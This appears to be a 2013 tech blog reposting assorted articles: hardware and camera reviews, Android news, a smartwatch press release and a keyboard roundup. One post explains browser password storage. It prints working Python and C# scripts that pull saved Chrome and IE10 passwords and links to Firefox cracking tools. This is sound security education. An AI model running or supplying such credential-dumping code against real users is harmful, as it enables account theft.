Friday, June 28, 2013

Intel Core i3-3220 review

Intel Core i3-3220 review
  • Intel Core i3-3220
  • Intel Core i3-3220
  • Intel Core i3-3220
  • Intel Core i3-3220
  • Intel Core i3-3220


The Intel Ivy Bridge technology is the finest desktop processor tech this side of Haswell, and for the PC build without severe budgetary constraints, it's the architecture we're telling you to stick into your gaming rig.
But what are those of you on a budget missing by dropping down the IvB stack to the i3 range, and would we still recommend Intel over AMD at this price point?
The current Core i3 range of CPUs is the real entry point for getting Ivy Bridge. At £100, this Core i3-3225 is at the budget end of the spectrum, though it isn't the cheapest on offer. You can pick up other i3 chips for less than a ton, but then you're dipping below the 3GHz mark and missing out on the top end of the Ivy Bridge HD graphics.
The i3-3225 comes with a decent 3.3GHz clock speed and the top HD 4000 graphics. As is the way with i3 chips, this is a dual-core CPU, but unlike the i5 range, Intel has turned HyperThreading back on.
What you don't get is any K series goodness at this unfashionable end of the Ivy Bridge table. That means you're stuck at 3.3GHz, so the legendary overclocking prowess of the Intel tech is completely lost on the i3 market.
That's a massive shame for the eager budget overclockers, but Intel obviously doesn't want anyone getting i5 performance out of an i3 chip, even if it has to introduce artificial barriers.

Budgeting

In this price range you can take your pick of the competition - AMD has three different options for around the £100 mark and that should give pause for thought for even the most ardent Intel fan.
First off there's last month's new AMD offering, the Trinity A10-5800K, which is the alternative for anyone who's looking for integrated graphics performance. The HD 7660D graphics in the Trinity chip outperforms the HD 4000 on the Intel side by a huge margin - we hit 27fps in Batman: Arkham City at 'v high' settings at 1080p. The i3-3225 barely managed 16fps.
In terms of CPU performance the i3 has the edge, but with a little overclocking of the AMD chip you can close the gap.

Benchmarks

The i3-3225's general CPU performance is pretty good, but when you consider the similarly priced AMD chips - with access to overclocking - it starts to look a little off the pace. It will still keep a decent GPU filled in games though.
CPU rendering performance
Cinebench R11.5: Index score: Higher is better

INTEL CORE I3-3225: 3.25
AMD FX-6200: 4.32
AMD A10-5800K: 3.05
CPU encoding performance
X264 v4.0: FPS: Higher is better

INTEL CORE I3-3225: 18.82
AMD FX-6200: 27.81
AMD A10-5800K: 18.83
CPU gaming performance
Batman: AC: FPS: Higher is better

INTEL CORE I3-3225: 126
AMD FX-6200: 110
AMD A10-5800K: 74
For us, the real competition for this i3 chip is the six-core FX-6200. For the exact same price as the i3-3225 you get another two cores for your cash and that makes for much higher multi-threaded performance. Again, the AMD chip can be overclocked where the Intel can't, putting the 6200 almost on the same CPU level as an i5 at stock speeds.
So, the question I posited earlier regarding our recommendations at the budget level is actually an easy one to answer. There are really two options here, but neither of them is Intel-based.
If you're not going to let a discrete card anywhere near your PC then the Trinity chip will deliver almost gaming-capable performance on its own, and the FX-6200 will defeat the i3-3225 in most tests. It's close at stock speeds, but the Intel chip falls behind when you start to consider the impressive overclocking performance of the AMD chips.



Verdict:

A good entry-level CPU for general desktop use

Review Date: 31 Dec 2012
Price when reviewed: £92
Buy it now for: £92
(see more store prices)








We have just obtained some screenshots of an early Android 4.3 build running on a Snapdragon-powered Galaxy S4

We have just obtained some screenshots of an early Android 4.3 build running on a Snapdragon-powered Galaxy S4 (GT-I9505). The test build was originally for the Google Play Edition Galaxy S4 (GT-I9505G), as we can see from the screenshot of “About phone”.
According to the screenshots, the Android version is “4.3” and the build number is “JWR66N.S005.130625“. Android build number is “JWR66N,” and “S005.130625″ is something which Samsung has added to keep a record of internal test builds.
Google hasn’t made Android 4.3 public yet, but it’s good to know that OEMs already have access to the source code. Early access will result in quick software updates and less Android fragmentation
 



Google Calendar Update for Android: Custom Colors and much more

Google Calendar Update for Android: Custom Colors and More

One of the most requested features we’ve seen so far for Google Calendar on Android is the ability to customize event and calendar colors directly from your device. Today’s update allows you to do just that. Now you can highlight those super-urgent meetings and important birthdays, or just switch up the color of your calendar whenever your heart desires.


Adding events is now easier and more fun with our redesigned date and time pickers, which let you schedule your special dinner date or the start of your well-deserved vacation in a snap.


For all of you world travelers, our redesigned timezone picker makes it simpler to find the region that you’re looking for, whether you’re in San Francisco, Tokyo or Zurich.

Finally, it’s easier to schedule repeating events. You can now set events to repeat every Tuesday and Thursday, every month, or every 7 weeks, it’s completely up to you.

The latest version of Google Calendar is built for devices running Android 4.0.3 and above (Android 4.1 or higher for custom event colors). Get it on Google Play, rolling out over the course of the day, and let us know what you think.



Samsung 2013 Smart TV Platform - Gesture and Voice Control, Touchpad Remote Control and Second Screen Support

Samsung Smart Interaction: Hands-on with voice and gestureSamsung Voice Control

Samsung 2013 Smart TV Platform - Gesture and Voice Control, Touchpad Remote Control and Second Screen Support

Samsung 2013 Smart TV Platform - Gesture and Voice Controls cont.

For all their improvements, we actually didn't actually use either the voice or gesture controls very often. For starters, despite the improvements the gesture control system is still extremely tiring to use, with soreness setting in after just a few seconds of using the system. We also still regularly suffered moments where the gesture control system failed to recognise one of our ‘close hands to select’ gestures, even with light levels in our test room set high enough that the camera should easily be able to see what we were doing.

As for the voice control, the system still fairly regularly failed to accurately understand something we were saying, and we’d also argue that the way some aspects of the menus have to be structured to accommodate voice command access can make them feel ultimately more long-winded than just using a remote control.

Samsung is keen to point out that the voice and gesture controls uniquely enable you to use its Smart TVs without needing a physical remote control. This could be handy if the dog’s run off with your handset or, like us, you’re prone to wandering around the house remote in hand, and then leaving it somewhere obscure.

There are also times – usually involving inputting text into search fields – where the voice control can have its uses, provided you don’t mind wrestling with its frequent misunderstandings.

Samsung 2013 Smart TV Platform - Touchpad Remote Control

However, overall, despite the improvements, we still feel that the gesture and voice controls remain not only pretty niche in their usefulness, but also arguably an extra complication rather than a way to make life easier. Highlighting the frustrations of the gesture and voice control systems is the groovy new touchpad remote Samsung is shipping with its upper-tier TVs this year.



This improves in every way over the touchpad remote Samsung introduced last year. The touchpad section is much more tactile and much more sensibly calibrated in terms of its responsiveness. The application of ‘slider’ bars around the touchpad’s edges so you can shift instantly between pages is a great touch too, and the button layout is excellent. The way the sparsely-buttoned remote interfaces with a new on-screen menu system accessed via the ‘More’ key also works a treat.

Add to all this the glorious weight, balance and finish of the touchpad remote and it’s little wonder that it almost immediately became our default 55F8000 controller. Last year, by comparison, we found ourselves falling back for the most part on the standard remote design that was included alongside the touchpad model. Samsung has included a normal remote with the F8000 models too, although we hardly ever felt compelled to use it.


Samsung 2013 Smart TV Platform - Second Screen support

The last key element of Samsung’s latest Smart interface we need to check out is the way it liaises with second screen devices via Samsung’s Smart View app. And here again things are a bit hit and miss.

For starters, there isn’t currently the level of feature parity across Samsung’s Android and iOS apps that we’d really expect to find in this day and age. Samsung assures us that the currently lagging iOS app will be raised to something at least similar in abilities to the Android one, but we can’t help but think that all apps should be equal from day one.

Samsung Smart TV interface

Focusing on the Android platform, given that this is the most fully developed system at the time of writing, the most impressive feature without doubt is the way you can stream not only what’s showing on the TV screen to your mobile device (even it’s coming in from an AV input rather than the tuners), but also a different broadcast channel to the one being watching on the TV. Just press the video screen in Samsung’s Smart View app and the image is overlaid with two separate volume and programme controls: one for the TV and one for the app. Switching to a different channel on the second device really couldn’t be easier.

This is the main feature you don’t currently get with the iOS app. You can only watch the same programme on your Apple device that you’re watching on the TV screen.




Ask Siri How to Spell Unfamiliar Words

Ask Siri How to Spell Unfamiliar Words



Siri is a new feature available on the iPhone 4S. I find myself asking others how to spell unfamiliar often. When no one is around I have to find a different word to use. If you are like me Siri can be very helpful. Simply ask Siri "how do you spell..." and Siri will give you the correct spelling in seconds. Siri has many other useful functions such as defining words. To learn more about the iPhone 4S and its accessibility features click here.



Thursday, June 27, 2013

Sony SmartWatch 2 unveiled: a water-resistant 'second screen' for Android devices


Introducing Sony SmartWatch 2 – the world’s first water-resistant smartwatch with NFC connectivity*

June 25, 2013

25th June 2013, Mobile Asia Expo, Shanghai – Sony Mobile Communications (“Sony Mobile”) today introduces Sony SmartWatch 2 SW2, the most advanced smartwatch available*. Sony SmartWatch 2 is a second screen for your Android smartphone that, as well as enhancing existing phone functionality, offers unique new benefits. Combining form and function in a sleek design, it serves as a multi-functional watch, notifier, Android app interface and phone remote control, all-in-one.

Openness with Android

App expandability is key to Sony SmartWatch 2. It can be personalised with more dedicated apps than any other smartwatch* to seamlessly suit your needs, whether you are on the go, keeping active, in business meetings or simply at home.
Download a host of SmartWatch apps and experience a range of unique functions – many of which can even be enjoyed without ever needing to reach for your phone:
  • Handle your calls by a simple touch of your wrist
  • Take a photo remotely from your SmartWatch, using a smart camera app
  • Control your presentations remotely using Presentation Pal
  • Taking a run or on the bike? Select a mapping app on SmartWatch to check your route with a quick glance at your wrist
  • Read previously downloaded e-mails when not connected to your phone
  • Use lifestyle apps like Runtastic to map and instantly track your fitness activities on the go
Quickly and easily adjust the tracks and volume on your music player, without ever taking your phone from your pocket
SmartWatch 2 is also both sleek and reassuringly robust thanks to its water and dust resistant design, giving you the freedom to enjoy it on the beach or simply on the go – come rain or shine.

An increasing market in wearable tech

A typical smartphone user reaches for their phone many times a day to read messages, check the time, view and make social media updates, use their favourite apps, take photos, listen to music and play mobile games. SmartWatch 2 addresses this need by offering you a convenient touch screen device so you no longer need to remove your phone from your pocket or bag.
“Sony is the proud leader in the smartwatch market** since introducing our first Bluetooth watch in 2007,” says Stefan K Persson, Head of Companion Products at Sony Mobile Communications.
“Competitors are only now launching first generation devices, while we are already launching a 3rd generation device with all the insight gained from over half a million customers combined with Sony’s wealth of technology expertise to create the best ever smartwatch experience.”
“The future of wearable devices is incredibly bright with analyst research predicting 41 million ‘smart’ watches will be sold by 2016,” continues Persson. “We have over 200 unique apps dedicated for Sony SmartWatch with over one million downloads to date and we are continuing to work with our strong developer network to deliver ever more compelling smartwatch experiences.” 

The best of Sony in a SmartWatch

If you use Android, on either smartphone or tablet, Sony SmartWatch 2 is your ideal smartwatch partner.
It’s easy and convenient to access notifications from your wrist such as messages, calls, email, Facebook™/Twitter™, Calendar, or use it as a remote for your Walkman™ or other digital media player. This wireless accessory is ideal for pairing with large-screen devices, such as the newly announced Xperia™ Z Ultra, in situations which call for discrete usage.
SmartWatch 2 introduces new features as a natural successor to the current Sony SmartWatch such as NFC connectivity for one-touch pairing, stunning premium design and a range of technologies including higher resolution for sharper viewing, better visibility even in sunlight, longer battery stamina, more intuitive interface, standalone watch functionality and a wide range of pre-installed and recommended apps.
When not connected to your phone, SmartWatch 2 works as a standalone digital watch. Read previously received notifications, access the time, set your alarm or even use as a light when searching for your keys.
SmartWatch 2 can also be personalised with any standard 24mm wristband and new Sony watchstraps will soon be available for further expression of your personal style.
Using groundbreaking design, Sony continues to introduce new technologies and has the largest range of NFC accessories available from wireless headsets to portable speakers, TVs, SmartTags and SmartWatch.
Sony SmartWatch 2 SW2 will be available worldwide from September 2013.



Wednesday, June 26, 2013

How Browsers Store Your Passwords


How Browsers Store Your Passwords


Introduction

In a previous post, I introduced a Twitter bot called dumpmon which monitors paste sites for account dumps, configuration files, and other information. Since then, I've been monitoring the information that is detected. While you can expect a follow-up post with more dumpmon-filled data soon, this post is about how browsers store passwords.

I mention dumpmon because I have started to run across quite a few pastes like this that appear to be credential logs from malware on infected computers. It got me thinking - I've always considered it best to not have browsers store passwords directly, but why? How easy can it be for malware to pull these passwords off of infected computers? Since sources are a bit tough to find in one place, I've decided to post the results here, as well as show some simple code to extract passwords from each browser's password manager.

The Browsers

For this post, I'll be analyzing the following browsers on a Windows 8 machine. Here's a table of contents for this post to help you skip to whatever browser you're interested in:

Chrome 27.0.1453.110
IE 10
Firefox 21.0



Logos by Paul Irish
Chrome
Difficulty to obtain passwords: Easy


Let's start with Chrome. Disappointingly, I found Chrome to be the easiest browser to extract passwords from. The encrypted passwords are stored in a sqlite database located at "%APPDATA%\..\Local\Google\Chrome\User Data\Default\Login Data". But how do they get there? And how is it encrypted? I got a majority of information about how passwords are stored in Chrome from this article written over 4 years ago. Since a bit has changed since then, I'll follow the same steps to show you how passwords are handled using snippets from the current Chromium source (or you justskip straight to the decryption).

Encryption and Storing Passwords
When you attempt to log into a website, Chrome first checks to see if it was a successful login:





We can see that if it's a successful login, and you used a new set of credentials that the browser didn't generate, Chrome will display a bar asking if you want your password to be remembered:





To save space, I'm omitting the code that creates the Save Password bar. However, if we click "Save password", the Accept function is called, which in turn calls the "Save" function of Chrome's password manager:





Easy enough. If it's a new login, we need to save it as such:





Again to save space, I've snipped a bit out of this (a check is performed to see if the credentials go to a Google website, etc.). After this function is called, a task is scheduled to perform the AddLoginImpl() function. This is to help keep the UI snappy:





This function attempts to call the AddLogin() function of the login database object, checking to see if it was successful. Here's the function (we're about to see how passwords are stored, I promise!):





Now we're getting somewhere. We create an encrypted string out of our password. I've snipped it out, but below the "sql::Statement" line, a SQL query is performed to store the encrypted data in the Login Data file. The EncryptedString function simply calls the EncryptString16 function on an Encryptor object (this just calls the following function below):





Finally! We can finally see that the password given is encrypted using a call to the Windows API function CryptProtectData. This means that the password is likely to only be recovered by a user with the same logon credential that encrypted the data. This is no problem, since malware is usually executed within the context of a user.

Decrypting the Passwords

Before talking about how to decrypt the passwords stored above, let's first take a look at the Login Data file using a sqlite browser.





Our goal will be to extract the action_url, username_value, and password_value (binary, so the SQLite browser can't display it) fields from this database. To decrypt the password, all we'll need to do is make a call to the Windows API CryptUnprotectData function. Fortunately for us, Python has a great library for making Windows API calls called pywin32.

Let's look at the PoC:




from os import getenv
import sqlite3
import win32crypt

# Connect to the Database
conn = sqlite3.connect(getenv("APPDATA") + "\..\Local\Google\Chrome\User Data\Default\Login Data")
cursor = conn.cursor()
# Get the results
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
# Decrypt the Password
password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1]
if password:
print 'Site: ' + result[0]
print 'Username: ' + result[1]
print 'Password: ' + password


view rawchrome_extract.pyThis Gist brought to you by GitHub.

And, by running the code, we see we are successful!






While it was a bit involved to find out how the passwords are stored (other dynamic methods could be used, but I figured showing the code would be most thorough), we can see that not much effort was needed to actually decrypt the passwords. The only data that is protected is the password field, and that's only in the context of the current user.

Internet Explorer
Difficulty to obtain passwords: Easy/Medium/Hard (Depends on version)

Up until IE10, Internet Explorer's password manager used essentially the same technology as Chrome's, but with some interesting twists. For the sake of completeness, we'll briefly discuss where passwords are stored in IE7-IE9, then we'll discuss the change made in IE10.

Internet Explorer 7-9

In previous versions of Internet Explorer, passwords were stored in two different places, depending on the type of password.

Registry (form-based authentication) - Passwords submitted to websites such as Facebook, Gmail, etc.
Credentials File - HTTP Authentication passwords, as well as network login credentials

For the sake of this post, we'll discuss credentials from form-based authentication, since these are what an average attacker will likely target. These credentials are stored in the following registry key:

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2

Looking at the values using regedit, we see something similar to the following:





As was the case with Chrome, these credentials are stored using Windows API function CryptProtectData. The difference here is that additional entropy is provided to the function. This entropy, also the registry key, is the SHA1 checksum of the URL (in unicode) of the site for which the credentials are used.

This is beneficial because when a user visits a website IE can quickly determine if credentials are stored for it by hashing the URL, and then using that hash to decrypt the credentials. However, if an attacker doesn't know the URL used, they will have a much harder time decrypting the credentials.

Attackers will often be able to mitigate this protection by simply iterating through a user's Internet history, hashing each URL, and then checking to see if any credentials have been stored for it.

While I won't paste the entire code here, you can find a great example of a full PoC here. For now, let's move on to IE10.

Internet Explorer 10

IE10 changed the way it stores passwords. Now, all autocomplete passwords are stored in the Credential Manager in a location called the "Web Credentials". It looks something like the following:





To my knowledge (I wasn't able to find much information on this), these credential files are stored in %APPDATA%\Local\Microsoft\Vault\[random]. A reference to what these files are, and the format used could be found here.

What I do know is that it wasn't hard to obtain these passwords. In fact, it was extremely easy. For Windows Store apps, Microsoft provided a new Windows runtime for more API access. This runtime provides access to a Windows.Security.Credentials namespace which provides all the functionality we need to enumerate the user's credentials.

In fact, here is a short PoC C# snippet which, when executed in the context of a user, will retrieve all the stored passwords:




using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using Windows.Security.Credentials;

namespace PasswordVaultTest
{
class Program
{
static void Main(string[] args)
{
// Create a handle to the Widnows Password vault
Windows.Security.Credentials.PasswordVault vault = new PasswordVault();
// Retrieve all the credentials from the vault
IReadOnlyList<PasswordCredential> credentials = vault.RetrieveAll();
// The list returned is an IReadOnlyList, so there is no enumerator.
// No problem, we'll just see how many credentials there are and do it the
// old fashioned way
for (int i = 0; i < credentials.Count; i++)
{
// Obtain the credential
PasswordCredential cred = credentials.ElementAt(i);
// "Fill in the password" (I wish I knew more about what this was doing)
cred.RetrievePassword();
// Print the result
Console.WriteLine(cred.Resource + ':' + cred.UserName + ':' + cred.Password);
}
Console.ReadKey();
}
}
}


view rawie_extract.csThis Gist brought to you by GitHub.

When executing the program, the output will be similar to this:





Note: I removed some sites that I believe came from me telling IE not to record. Other than that, I'm not sure how they got there.

As you can see, it was pretty trivial to extract all the passwords in use from a given user, as long as our program is executing in the context of the user. Moving right along!

Firefox
Difficulty to obtain passwords: Medium/Very Hard

Next let's take a look at Firefox, which was tricky. I primarily used these slides (among a multitude of other resources) to find information about where user data is stored.

But first, a little about the crypto behind Firefox's password manager. Mozilla developed a open-source set of libraries called "Network Security Services", or NSS, to provide developers with the ability to create applications that meet a wide variety of security standards. Firefox makes use of an API in this library called the "Secret Decoder Ring", or SDR, to facilitate the encryption and decryption of account credentials. While it may have a "cutesy name", let's see how it's used by Firefox to provide competitive crypto:

When a Firefox profile is first created, a random key called an SDR key and a salt are created and stored in a file called "key3.db". This key and salt are used in the 3DES (DES-EDE-CBC) algorithm to encrypt all usernames and passwords. These encrypted values are then base64-encoded, and stored in a sqlite database called signons.sqlite. Both the "signons.sqlite" and "key3.db" files are located at %APPDATA%/Mozilla/Firefox/Profiles/[random_profile].

So what we need to do is to get the SDR key. As explained here, this key is held in a container called a PKCS#11 software "token". This token is encapsulated inside of a PKCS#11 "slot". Therefore, to decrypt the account credentials, we need to access this slot.

But there's a catch. This SDR key itself is encrypted using the 3DES (DES-EDE-CBC) algorithm. The key to decrypt this value is the hash of what Mozilla calls a "Master Password", paired with another value found in the key3.db file called the "global salt".

Firefox users are able to set a Master Password in the browser's settings. The problem is that many users likely don't know about this feature. As we can see, the entire integrity of a user's account credentials hinges on the complexity of chosen password that's tucked away in the security settings, since this is the only value not known to the attacker. However, it can also been that if a user picks a strong Master Password, it is unlikely that an attacker will be able to recover the stored credentials.

Here's the thing - if a user doesn't set a Master Password, a null one ("") is used. This means that an attacker could extract the global salt, hash it with "", use that to decrypt the SDR key, and then use that to compromise the user's credentials.

Let's see what this might look like:






To get a better picture of what's happening, let's briefly go to the source. The primary function responsible for doing credential decryption is calledPK11SDR_Decrypt. While I won't put the whole function here, the following functions are called, respectively:


PK11_GetInternalKeySlot() //Gets the internal key slot
PK11_Authenticate() //Authenticates to the slot using the given Master Password
PK11_FindFixedKey() //Gets the SDR key from the slot
pk11_Decrypt() //Decrypts the base64-decoded data using the found SDR key
As for example code to decrypt the passwords, since this process is a bit involved, I won't reinvent the wheel here. However, here are two open-source projects that can do this process for you:

FireMaster - Brute forces master passwords
ffpasscracker - I promised you Python, so here's a solution. This uses the libnss.so library as a loaded DLL. To use this on Windows, you can use these cygwin DLL's.

Conclusion

I hope this post has helped clarify how browsers store your passwords, and why in some cases you shouldn't let them. However, it would be unfair to end the post saying that browsers are completely unreliable at storing passwords. For example, in the case of Firefox, if a strong Master Password is chosen, account details are very unlikely to be harvested.

But, if you would like an alternative password manager, LastPass, KeePass, etc. are all great suggestions. You could also implement two-factor authentication using a device such as a YubiKey.

As always, please don't hesitate to let me know if you have any questions or suggestions in the comments below.



Canon PowerShot SX50 HS review


Canon powershot

Canon's superzoom bridge packs a whopping 50x zoom



Recommended award
The bridge area of the compact camera market is one part of the market that is still doing well in what is otherwise a declining segment.
Manufacturers are packing larger and larger zooms onto these cameras which, for many, act as an alternative to a DSLR, or a step up from a standard compact camera.
Two key features distinguish the 12.1 million pixel Canon PowerShot SX50 HS from the 12.1MP Canon PowerShot SX40 HS that it replaces at the top of Canon'sbridge camera or superzoom lineup.

Canon PowerShot SX50 HS

Buying Guide
Fuji X100
Best compact camera 2012
The Canon PowerShot SX50, announced at Photokina 2012 alongside the Canon PowerShot G15 and Canon EOS 6D, has a 50x optical zoom that covers theequivalent of 24-1200mm, whereas the zoom range on the Canon SX40 is 35x, or 24-840mm.
This is a phenomenal zoom range that most DSLR users can only dream of, or perhaps look to achieve at huge expense. The Canon PowerShot SX50 HS is much more affordable, with a price of £448 (about AU$700) in the UK and US$479 in the US.
The 24mm point is ideal for capturing landscapes and indoor scenes, while the longest telephoto point is perfect for photographing distant wildlife or picking out details.
For those who feel that a 50x zoom still isn't enough, the camera boasts a digital zoom that expands it to 100x. Canon calls this 100x Zoom Plus.

Canon PowerShot SX50 HS review
Another important improvement that the Canon SX50 HS makes over the Canon SX40 is that it can record raw format images as well as JPEG files. For enthusiast photographers, this makes the camera a much more attractive proposition, since it means that the files can be processed manually if you desire.
Probably the biggest competitor to the Canon SX50 HS in the bridge camera market is the also recently announced Panasonic FZ200. Although that camera only features a 24x optical zoom, it does boast an f/2.8 constant aperture throughout the range. By contrast, the Canon can only manage f/3.4 at the widest point, rising up to f/6.5 at the telephoto end.
Other features of the Canon SX50 include a Digic 5 processor, which is the same as those found in Canon's top-end DSLRs such as the Canon 5D Mark III. This should mean that noise is controlled well at high sensitivity settings, and it also facilitates Full HD video recording.



The Best Android Keyboards


The Best Android Keyboards


Spend any time using your phone or tablet and it’s hard to avoid using the keyboard. Whether knocking out a quick email or typing URLs into your browser, there’s a limit to what you can get done without having to type. And chances are that the keyboard baked into your copy of Android is nothing to write home about — there are few stock keyboards that really cut the mustard.
Sitting at my desktop or using my laptop, I’m a fairly accomplished typist — I’m probably not the fastest in the world, but I’m certainly faster than average. The same cannot really be said when I’m using my Android devices — touchscreens offer a completely different way of interacting with a device and it proves, on the most part, to be a slower form of typing. This is why I find myself on a constant mission to track down the perfect keyboard. If you’re on a similar quest, and whatever your preferred style of typing — one-handed, two-handed, gesture input, just a forefinger — this roundup of the pick of the crop should help you find a keyboard that suits you.

SwiftKey
A keyboard may seem like something you shouldn’t have to pay for, but this was the first of its ilk to tempt me into parting with some cash. SwiftKey does not disappoint; gesture support (or Flow) is impressively accurate as is word prediction. These two features combined found me flying through long passages of text in next to no time.
Swiftkey is still one of the keyboards I keep coming back to (I switch between this and Google Keyboard at the moment) and I often find that I only have to swipe the first word and the rest is accurately predicted — obviously this only works in certain circumstances such as standard SMS replies, I’ve not been able to train the app to write full reviews for me yet!
Swiftkey supports a large number of languages and has the handy option to have up to three enabled at the same time and easily switchable. The one disappointing feat is that there are separate versions for phones and tablets so you’ll have to make two purchases if you own both types of devices.
Price: $3.99
Google Play Link: SwiftKey
Developer: SwitftKey

Swiftkey’s signature keyboard with Flow
Kii
Kii is another swipe-friendly keyboard which prides itself on the fact that it borrows ideas from many of the other keyboards featured in this roundup. Skins are supported so there’s scope for changing the look of your keyboard to suit your mood or the lighting you find yourself in. There’s also more than one keyboard layout to choose from including an interesting split option which is ideal for thumb operation on a tablet.
What is irritating is that while the app is free, many of the features are available as in-app purchases — or at least uninterrupted use requires an in-app purchase. Voice support and rows of extra buttons are nice touches, but it is in terms of speed that Kii really excels.
Price: Free
Google Play Link: Kii
Developer: Kii Dev

Kii’s split keyboard layout is useful on tablets
GO Keyboard
The GO development team are responsible for a number of extremely popular apps including the impressive GO Launcher. It’s a shame to put a dampener on an otherwise great app, but there is a slightly beta-ish feel to GO Keyboard that is often found in many GO apps.
There are a massive number of themes to choose from to help with customization, as there are emoji, but many of them are garish, amateur-looking affairs. This feeling is not helped by badly worded descriptions and options that have clearly been poorly translated into English. However, switching between different keyboard layouts is little more than a side swipe away which is handy for anyone who works in more than one language — and there are dozens to choose from.
Price: Free
Google Play Link: GO Keyboard
Developer: GO Dev Team

Go Keyboard supports themes, emojis and several input methods
Google Keyboard
One of the latest additions to the keyboard smorgasbord is Google’s very own offering. Lifted directly from devices such as the Nexus 7, this keyboard won over huge armies of fans long before it was made available to all Android devices. It is very hard not to love this keyboard as it feels like it really belongs in Android — as well it should be — and while it may not seem all that impressive, looks can be deceptive. Lurking beneath a rather plain exterior is arguable the best gesture typing available, in both speed and accuracy.
There may not be a massive number of options in terms of layouts and extra settings, but what is present works superbly and you’ll soon wonder how you coped with any other keyboard — that’s how I felt, at least, and I’m hard to impress. There’s also a very useful hidden feature that can be used to ape the likes of Text Expander and further reduce the amount of typing you need to do. When adding new words to your personal dictionary, it’s possible to add shortcuts — this means you can opt to automatically expand ‘brb’ into ‘be right back’, but there are endless other possibilities.
Price: Free
Google Play Link: Google Keyboard
Developer: Google

Google’s own keyboard looks and feels at home on Android
Swype Keyboard
Swype is the original swiping keyboard. Where it led, countless others apps followed. Many have tried to copy it, but few have matched it and fewer still bettered it. Prediction levels here are staggeringly good and you don’t even need to be particularly accurate with your gestures as the app does a good job of interpreting what you mean based on the shape you draw. Two key strengths of Swype, and something that helps to improve its accuracy, are its ability to pick up word and names from your contacts, emails and other documents, as well as the fact that the dictionary is crowd-sourced.
The predictions dictionary is constantly updated with words that are trending around the world and this extends into next-word prediction – so you should find that you can enter the name of a brand new movie or TV programme very quickly. With voice recognition and a universal app suitable for tablets and phones — additional modes are available for tablet users — it’s difficult not to recommend Swype. If you’re yet to try it out, install it this instant to see what all the fuss is about.
Price: $0.99
Google Play Link: Swype Keyboard
Developer: Swype

Swype offers several layouts for phones and tablets
TouchPal
Gesture-based or sliding typing, as you’ve probably noticed from this roundup, is becoming the norm. TouchPal looks to up the ante with its Curve feature which aims to make typing even faster by eliminating the need to swipe words in their entirety. Another time saving feature makes it easier to access numbers and symbols. Rather than tapping and holding a key to view a list of alternative options, you can instead swipe up or down for instant access.
Despite having no cost associated with it, TouchPal’s range of supported languages is wide and varied. To help with the personalization of suggestions and auto-completes, information can be imported from our address book and online updates ensure that a new supply of words is always available. Or course, there is the usual raft of skins available, but the key thing here is speed. TouchPal is undeniably fast – even though this does come at the expense of accuracy.
Price: Free
Google Play Link: TouchPal
Developer: TouchPal



TouchPal trades accuracy for speed
Smart Keyboard Pro
As if to prove that swipe typing is not the only option for getting characters into apps, Smart Keyboard Pro takes a much more traditional approach to things. Everything is much more basic here, and the app closely resembles the look and feel of the iOS keyboard. This is by no means a bad thing but you are restricted to typing by pressing each character you want to enter.
For fans of old technology, Smart Keyboard Pro has a great feature – the resurrection of T9 prediction text input using a traditional phone pad layout! There are no fancy extras like next word prediction but it does win points for being highly customizable.
Price: $2.64
Google Play Link: Smart Keyboard Pro
Developer: Dexilog, LLC



Smart Keyboard goes old-school with its iOS look and functions
Other Unique Options
Above are some of the highlights that are to be currently found in the Play store. You’ll probably have noticed that, while there are a few subtle differences here and there, for the most part these are keyboards that look and feel fairly similar to each other.
Minuum
One project that looks to disturb the norm is Minuum, which has been funded through Indiegogo and will initially be released for Android devices, with the possibility of iOS, Blackberry and Windows Phone versions to follow. The key aim of the project is to free up screen space by shrinking the keyboard as much as possible.
The look is unique. The tiny strip you use to type looks too small and fiddly to be usable – a standard keyboard has been compressed onto a single line – but by employing a combination of letter and word prediction, in the sample videos at least, Minuum appears to fare very well indeed. It is an outlandish design that will not be to everyone’s taste, but it is going to create a storm when it hits the Play Store.

Minuum’s unique one-strip layout
ZoomKee
If you’re looking for something a little more out of the ordinary, ZoomKee is worth a look. There’s a clue in the name here, and the key selling point — although the app is actually free — is a zoom function. Tap a word that has been typed and it will be displayed in a larger view complete with a zoomed in keyboard. This has been done to make word editing easier, but it does mean that you have to be willing to slide the keyboard from side to side as it is not entirely visible in its magnified mode.

ZoomKee’s signature zooming function
Thumb Keyboard
Another keyboard of note is Thumb Keyboard ($2.35 from Google Play) which is available for phones and tablets and, as the name suggest, allows for quick thumb driven typing. At first glance it looks like nothing out of the ordinary, but there is an intriguing split mode that make it easier and faster to type with just thumbs and a personalized shortcut bar. There are different layouts for different sized screens but this is definitely a keyboard for fans of two-handed typing.

Thumb Keyboard packs a split layout and a nifty shortcut bar
Do you have a favorite keyboard that we’ve missed? Have you found your perfect input app or do you find that you constantly switch from one to another? Share your thoughts and experiences in the comments.